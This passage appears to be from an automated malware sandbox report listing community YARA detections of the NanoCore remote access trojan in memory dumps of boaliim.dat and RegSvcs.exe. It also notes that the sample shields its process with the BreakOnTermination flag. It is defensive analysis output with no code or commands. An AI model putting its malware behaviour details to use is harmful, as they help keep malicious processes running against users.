Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
